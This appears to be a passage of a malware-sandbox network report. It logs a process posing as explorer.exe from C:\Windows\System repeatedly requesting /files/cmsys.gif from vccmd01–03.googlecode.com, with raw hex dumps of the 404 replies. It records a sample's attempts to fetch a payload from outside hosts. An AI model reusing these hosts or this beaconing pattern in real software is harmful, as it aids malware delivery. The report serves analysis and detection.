                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:45.883853912 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    23192.168.2.56056164.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:50.878130913 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:51.807694912 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:51 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:51.807802916 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    24192.168.2.560572108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:52.996484995 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:53.909276009 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:53 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:53.909320116 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    25192.168.2.560583142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.841892004 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.772399902 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:55 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.773216009 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    26192.168.2.56061564.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.825922012 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.755189896 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:01 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.755228996 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    27192.168.2.560626108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:02.844604015 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:03.793977976 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:03 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:03.794009924 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    28192.168.2.560635142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:04.521572113 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:05.452581882 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:05 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:05.452691078 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    29192.168.2.56066164.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:08.733092070 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:09.656979084 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:09 GMT
